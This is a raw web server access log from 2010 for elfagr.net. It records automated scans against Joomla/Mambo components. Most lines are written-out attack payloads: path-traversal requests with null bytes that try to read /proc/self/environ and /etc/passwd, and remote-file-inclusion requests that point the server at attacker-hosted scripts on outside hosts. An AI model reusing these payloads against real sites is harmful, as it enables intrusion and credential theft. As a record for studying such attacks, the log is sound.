187.45.193.159 - - [20/May/2010:11:17:29 -0700] "GET /components/com_moofaq/includes/file_includer.php?gzip=0&file=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "elfagr.net"
187.45.193.159 - - [20/May/2010:11:17:39 -0700] "GET /logs//components/com_moofaq/includes/file_includer.php?gzip=0&file=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "elfagr.net"
187.45.193.159 - - [20/May/2010:11:27:21 -0700] "GET /logs/access.log//components/com_moofaq/includes/file_includer.php?gzip=0&file=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "elfagr.net"
187.45.193.159 - - [20/May/2010:11:27:22 -0700] "GET /components/com_moofaq/includes/file_includer.php?gzip=0&file=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "elfagr.net"
187.45.193.159 - - [20/May/2010:11:27:22 -0700] "GET /logs//components/com_moofaq/includes/file_includer.php?gzip=0&file=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "elfagr.net"
174.121.59.218 - - [20/May/2010:11:29:03 -0700] "GET /index.php?option=com_ckforms&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.834" "elfagr.net"
173.236.37.218 - - [20/May/2010:11:29:06 -0700] "GET /index.php?option=com_ckforms&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.810" "elfagr.net"
174.136.55.175 - - [20/May/2010:11:29:38 -0700] "GET /index.php?option=com_ckforms&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.823" "elfagr.net"
218.38.34.19 - - [20/May/2010:11:30:34 -0700] "GET /errors.php?error=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.79" "elfagr.net"
124.217.229.185 - - [20/May/2010:11:33:08 -0700] "GET /index.php?option=com_ckforms&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.810" "elfagr.net"
218.38.34.19 - - [20/May/2010:11:33:55 -0700] "GET /errors.php?error=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.79" "elfagr.net"
74.55.52.154 - - [20/May/2010:11:34:05 -0700] "GET /logs/access_100311.log/errors.php?error=http://plik.interfree.it/id.jpg? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.elfagr.net"
74.55.52.154 - - [20/May/2010:11:33:56 -0700] "GET /errors.php?error=http://plik.interfree.it/id.jpg? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.elfagr.net"
74.55.52.154 - - [20/May/2010:11:33:56 -0700] "GET /logs//errors.php?error=http://plik.interfree.it/id.jpg? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.elfagr.net"
218.38.34.19 - - [20/May/2010:11:35:16 -0700] "GET /logs/errors.php?error=http://kortech.cn/bbs//skin/zero_vote/fx29id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "elfagr.net"
218.38.34.19 - - [20/May/2010:11:35:08 -0700] "GET /errors.php?error=http://kortech.cn/bbs//skin/zero_vote/fx29id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "elfagr.net"
218.38.34.19 - - [20/May/2010:11:35:17 -0700] "GET /logs/access.log/errors.php?error=http://kortech.cn/bbs//skin/zero_vote/fx29id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "elfagr.net"
173.236.37.218 - - [20/May/2010:11:36:33 -0700] "GET /index.php?option=com_ckforms&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.810" "elfagr.net"
174.121.59.218 - - [20/May/2010:11:36:29 -0700] "GET /index.php?option=com_ckforms&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.834" "elfagr.net"
174.136.55.175 - - [20/May/2010:11:36:50 -0700] "GET /index.php?option=com_ckforms&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.823" "elfagr.net"
208.66.64.71 - - [20/May/2010:11:36:50 -0700] "GET /index.php?option=com_sectionex&controller=../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.808" "elfagr.net"
208.66.64.71 - - [20/May/2010:11:37:46 -0700] "GET /index.php?option=com_sectionex&controller=../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.808" "elfagr.net"
174.121.59.218 - - [20/May/2010:11:38:49 -0700] "GET /logs/access.log/index.php?option=com_ckforms&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.834" "elfagr.net"
174.121.59.218 - - [20/May/2010:11:38:40 -0700] "GET /index.php?option=com_ckforms&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.834" "elfagr.net"
174.121.59.218 - - [20/May/2010:11:38:49 -0700] "GET /logs/index.php?option=com_ckforms&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.834" "elfagr.net"
93.158.149.32 - - [20/May/2010:11:39:14 -0700] "GET /logs/access_091119.log HTTP/1.1" 200 0 "-" "Yandex/1.01.001 (compatible; Win16; I)" "www.elfagr.net"
173.236.37.218 - - [20/May/2010:11:39:58 -0700] "GET /logs/access.log/index.php?option=com_ckforms&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.810" "elfagr.net"
173.236.37.218 - - [20/May/2010:11:39:58 -0700] "GET /index.php?option=com_ckforms&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.810" "elfagr.net"
173.236.37.218 - - [20/May/2010:11:39:58 -0700] "GET /logs/index.php?option=com_ckforms&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.810" "elfagr.net"
124.217.229.185 - - [20/May/2010:11:40:52 -0700] "GET /index.php?option=com_ckforms&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.810" "elfagr.net"
174.136.55.175 - - [20/May/2010:11:41:37 -0700] "GET /logs/access.log/index.php?option=com_ckforms&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.823" "elfagr.net"
174.136.55.175 - - [20/May/2010:11:41:28 -0700] "GET /index.php?option=com_ckforms&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.823" "elfagr.net"
174.136.55.175 - - [20/May/2010:11:41:28 -0700] "GET /logs/index.php?option=com_ckforms&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.823" "elfagr.net"
91.215.216.30 - - [20/May/2010:11:44:11 -0700] "GET /?option=com_ckforms&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 1465 "-" "libwww-perl/5.832" "elfagr.net"
208.66.64.71 - - [20/May/2010:11:44:39 -0700] "GET /logs/access.log/index.php?option=com_sectionex&controller=../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.808" "elfagr.net"
208.66.64.71 - - [20/May/2010:11:44:48 -0700] "GET /index.php?option=com_sectionex&controller=../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.808" "elfagr.net"
208.66.64.71 - - [20/May/2010:11:44:39 -0700] "GET /logs/index.php?option=com_sectionex&controller=../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.808" "elfagr.net"
217.195.204.106 - - [20/May/2010:11:45:33 -0700] "GET /index2.php?option=com_ckforms&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.831" "elfagr.net"
124.217.229.185 - - [20/May/2010:11:47:54 -0700] "GET /logs/access.log/index.php?option=com_ckforms&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.810" "elfagr.net"
124.217.229.185 - - [20/May/2010:11:47:46 -0700] "GET /index.php?option=com_ckforms&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.810" "elfagr.net"
124.217.229.185 - - [20/May/2010:11:47:47 -0700] "GET /logs/index.php?option=com_ckforms&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.810" "elfagr.net"
121.88.4.141 - - [20/May/2010:11:52:01 -0700] "GET /index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 - "-" "libwww-perl/5.79" "elfagr.net"
174.136.55.175 - - [20/May/2010:11:53:17 -0700] "GET /logs/access.log/index.php?option=com_ckforms&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.823" "elfagr.net"
174.136.55.175 - - [20/May/2010:11:53:17 -0700] "GET /index.php?option=com_ckforms&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.823" "elfagr.net"
174.136.55.175 - - [20/May/2010:11:53:17 -0700] "GET /logs/index.php?option=com_ckforms&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.823" "elfagr.net"
91.215.216.30 - - [20/May/2010:11:53:36 -0700] "GET /?option=com_ckforms&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 1465 "-" "libwww-perl/5.832" "elfagr.net"
121.88.4.141 - - [20/May/2010:11:54:19 -0700] "GET /logs/access.log//index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 - "-" "libwww-perl/5.79" "elfagr.net"
121.88.4.141 - - [20/May/2010:11:54:20 -0700] "GET /index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 - "-" "libwww-perl/5.79" "elfagr.net"
121.88.4.141 - - [20/May/2010:11:54:29 -0700] "GET /logs//index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 - "-" "libwww-perl/5.79" "elfagr.net"
69.175.61.122 - - [20/May/2010:11:55:17 -0700] "GET /*.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.833" "elfagr.net"
88.191.94.188 - - [20/May/2010:11:57:43 -0700] "GET /logs/access_091126.log%20%20//components/com_mtree/Savant2/Savant2_Plugin_textarea.php?mosConfig_absolute_path=http://danny-dee.de//mambots/editors/tinymce/jscripts/tiny_mce/plugins/emotions/langs/id1.txt????? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.elfagr.net"
88.191.94.188 - - [20/May/2010:11:57:43 -0700] "GET /components/com_mtree/Savant2/Savant2_Plugin_textarea.php?mosConfig_absolute_path=http://danny-dee.de//mambots/editors/tinymce/jscripts/tiny_mce/plugins/emotions/langs/id1.txt????? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.elfagr.net"
88.191.94.188 - - [20/May/2010:11:57:43 -0700] "GET /logs//components/com_mtree/Savant2/Savant2_Plugin_textarea.php?mosConfig_absolute_path=http://danny-dee.de//mambots/editors/tinymce/jscripts/tiny_mce/plugins/emotions/langs/id1.txt????? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.elfagr.net"
88.191.94.188 - - [20/May/2010:11:57:44 -0700] "GET /logs/access_091126.log%20%20//components/com_mtree/Savant2/Savant2_Plugin_textarea.php?mosConfig_absolute_path=http://danny-dee.de//mambots/editors/tinymce/jscripts/tiny_mce/plugins/emotions/langs/id1.txt????? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.elfagr.net"
88.191.94.188 - - [20/May/2010:11:57:53 -0700] "GET /components/com_mtree/Savant2/Savant2_Plugin_textarea.php?mosConfig_absolute_path=http://danny-dee.de//mambots/editors/tinymce/jscripts/tiny_mce/plugins/emotions/langs/id1.txt????? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.elfagr.net"
88.191.94.188 - - [20/May/2010:11:57:53 -0700] "GET /logs//components/com_mtree/Savant2/Savant2_Plugin_textarea.php?mosConfig_absolute_path=http://danny-dee.de//mambots/editors/tinymce/jscripts/tiny_mce/plugins/emotions/langs/id1.txt????? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.elfagr.net"
69.175.61.122 - - [20/May/2010:11:58:25 -0700] "GET /logs/access.log/*.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.833" "elfagr.net"
69.175.61.122 - - [20/May/2010:11:58:16 -0700] "GET /*.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.833" "elfagr.net"
69.175.61.122 - - [20/May/2010:11:58:16 -0700] "GET /logs/*.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.833" "elfagr.net"
174.121.59.218 - - [20/May/2010:11:59:17 -0700] "GET /logs/access.log/index.php?option=com_ckforms&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.834" "elfagr.net"
174.121.59.218 - - [20/May/2010:11:59:17 -0700] "GET /index.php?option=com_ckforms&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.834" "elfagr.net"
174.121.59.218 - - [20/May/2010:11:59:09 -0700] "GET /logs/index.php?option=com_ckforms&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.834" "elfagr.net"
95.108.150.235 - - [20/May/2010:12:01:12 -0700] "GET /robots.txt HTTP/1.1" 200 37 "-" "Yandex/1.01.001 (compatible; Win16; H)" "www.elfagr.net"
95.108.150.235 - - [20/May/2010:12:01:04 -0700] "GET /robots.txt HTTP/1.1" 200 37 "-" "Yandex/1.01.001 (compatible; Win16; H)" "elfagr.net"
95.108.150.235 - - [20/May/2010:12:01:05 -0700] "GET / HTTP/1.1" 200 1465 "-" "Yandex/1.01.001 (compatible; Win16; H)" "www.elfagr.net"
95.108.150.235 - - [20/May/2010:12:01:06 -0700] "GET / HTTP/1.1" 200 1465 "-" "Yandex/1.01.001 (compatible; Win16; H)" "elfagr.net"
95.108.150.235 - - [20/May/2010:12:01:16 -0700] "GET / HTTP/1.1" 200 1465 "-" "Yandex/1.01.001 (compatible; Win16; H)" "www.elfagr.net"
95.108.150.235 - - [20/May/2010:12:01:08 -0700] "GET / HTTP/1.1" 200 1465 "-" "Yandex/1.01.001 (compatible; Win16; H)" "elfagr.net"
173.236.37.218 - - [20/May/2010:12:01:18 -0700] "GET /logs/access.log/index.php?option=com_ckforms&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.810" "elfagr.net"
173.236.37.218 - - [20/May/2010:12:01:09 -0700] "GET /index.php?option=com_ckforms&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.810" "elfagr.net"
173.236.37.218 - - [20/May/2010:12:01:09 -0700] "GET /logs/index.php?option=com_ckforms&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.810" "elfagr.net"
92.241.190.214 - - [20/May/2010:12:02:12 -0700] "GET /logs/access.log/?option=com_ninjarsssyndicator&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "elfagr.net"
92.241.190.214 - - [20/May/2010:12:02:22 -0700] "GET /?option=com_ninjarsssyndicator&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 1465 "-" "libwww-perl/5.805" "elfagr.net"
92.241.190.214 - - [20/May/2010:12:02:13 -0700] "GET /logs/?option=com_ninjarsssyndicator&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 5371 "-" "libwww-perl/5.805" "elfagr.net"
92.241.190.214 - - [20/May/2010:12:03:46 -0700] "GET /?option=com_ninjarsssyndicator&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 1465 "-" "libwww-perl/5.805" "elfagr.net"
124.217.229.185 - - [20/May/2010:12:04:13 -0700] "GET /logs/access.log/index.php?option=com_ckforms&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.810" "elfagr.net"
124.217.229.185 - - [20/May/2010:12:04:23 -0700] "GET /index.php?option=com_ckforms&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.810" "elfagr.net"
124.217.229.185 - - [20/May/2010:12:04:15 -0700] "GET /logs/index.php?option=com_ckforms&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.810" "elfagr.net"
69.175.61.122 - - [20/May/2010:12:09:26 -0700] "GET /logs/access.log/*.php?option=com_ninjarsssyndicator&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.833" "elfagr.net"
69.175.61.122 - - [20/May/2010:12:09:26 -0700] "GET /*.php?option=com_ninjarsssyndicator&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.833" "elfagr.net"
69.175.61.122 - - [20/May/2010:12:09:35 -0700] "GET /logs/*.php?option=com_ninjarsssyndicator&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.833" "elfagr.net"
69.175.61.122 - - [20/May/2010:12:10:24 -0700] "GET /*.php?option=com_ninjarsssyndicator&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.833" "elfagr.net"
92.241.190.214 - - [20/May/2010:12:15:33 -0700] "GET /logs/access.log/?option=com_ninjarsssyndicator&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "elfagr.net"
92.241.190.214 - - [20/May/2010:12:15:34 -0700] "GET /?option=com_ninjarsssyndicator&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 1465 "-" "libwww-perl/5.805" "elfagr.net"
92.241.190.214 - - [20/May/2010:12:15:35 -0700] "GET /logs/?option=com_ninjarsssyndicator&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 5371 "-" "libwww-perl/5.805" "elfagr.net"
74.55.52.154 - - [20/May/2010:12:17:57 -0700] "GET /logs/access_100311.log/errors.php?error=http://plik.interfree.it/id.jpg? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.elfagr.net"
74.55.52.154 - - [20/May/2010:12:17:57 -0700] "GET /errors.php?error=http://plik.interfree.it/id.jpg? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.elfagr.net"
74.55.52.154 - - [20/May/2010:12:17:57 -0700] "GET /logs//errors.php?error=http://plik.interfree.it/id.jpg? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.elfagr.net"
174.121.213.196 - - [20/May/2010:12:20:57 -0700] "GET /logs//vwar/convert/errors.php?error=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.810" "www.elfagr.net"
174.121.213.196 - - [20/May/2010:12:20:57 -0700] "GET /vwar/convert/errors.php?error=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.810" "www.elfagr.net"
218.38.34.19 - - [20/May/2010:12:25:09 -0700] "GET /logs/access.log/errors.php?error=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.79" "elfagr.net"
218.38.34.19 - - [20/May/2010:12:25:10 -0700] "GET /errors.php?error=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.79" "elfagr.net"
218.38.34.19 - - [20/May/2010:12:25:20 -0700] "GET /logs/errors.php?error=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.79" "elfagr.net"
218.38.34.19 - - [20/May/2010:12:30:21 -0700] "GET /logs/access.log/errors.php?error=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.79" "elfagr.net"
218.38.34.19 - - [20/May/2010:12:30:22 -0700] "GET /errors.php?error=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.79" "elfagr.net"
218.38.34.19 - - [20/May/2010:12:30:23 -0700] "GET /logs/errors.php?error=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.79" "elfagr.net"
217.195.204.106 - - [20/May/2010:12:30:51 -0700] "GET /logs/access.log/index2.php?option=com_ckforms&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.831" "elfagr.net"
217.195.204.106 - - [20/May/2010:12:31:01 -0700] "GET /index2.php?option=com_ckforms&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.831" "elfagr.net"
217.195.204.106 - - [20/May/2010:12:31:01 -0700] "GET /logs/index2.php?option=com_ckforms&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.831" "elfagr.net"
87.249.116.188 - - [20/May/2010:12:40:05 -0700] "GET /index.php?option=com_sbsfile&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.79" "elfagr.net"
87.249.116.188 - - [20/May/2010:12:41:48 -0700] "GET /logs/access.log//index.php?option=com_sbsfile&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.79" "elfagr.net"
87.249.116.188 - - [20/May/2010:12:41:40 -0700] "GET /index.php?option=com_sbsfile&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.79" "elfagr.net"
87.249.116.188 - - [20/May/2010:12:41:40 -0700] "GET /logs//index.php?option=com_sbsfile&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.79" "elfagr.net"
216.245.220.19 - - [20/May/2010:12:43:41 -0700] "GET /logs//components/com_sitemap/sitemap.xml.php?mosConfig_absolute_path=http://201.199.194.8/conta/auto1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "elfagr.net"
216.245.220.19 - - [20/May/2010:12:43:41 -0700] "GET /logs/access.log%20%20//components/com_sitemap/sitemap.xml.php?mosConfig_absolute_path=http://201.199.194.8/conta/auto1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "elfagr.net"
216.245.220.19 - - [20/May/2010:12:43:32 -0700] "GET /components/com_sitemap/sitemap.xml.php?mosConfig_absolute_path=http://201.199.194.8/conta/auto1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "elfagr.net"
216.245.220.19 - - [20/May/2010:12:43:43 -0700] "GET /components/com_sitemap/sitemap.xml.php?mosConfig_absolute_path=http://201.199.194.8/conta/auto1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "elfagr.net"
216.245.220.19 - - [20/May/2010:12:43:52 -0700] "GET /logs/access.log%20%20//components/com_sitemap/sitemap.xml.php?mosConfig_absolute_path=http://201.199.194.8/conta/auto1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "elfagr.net"
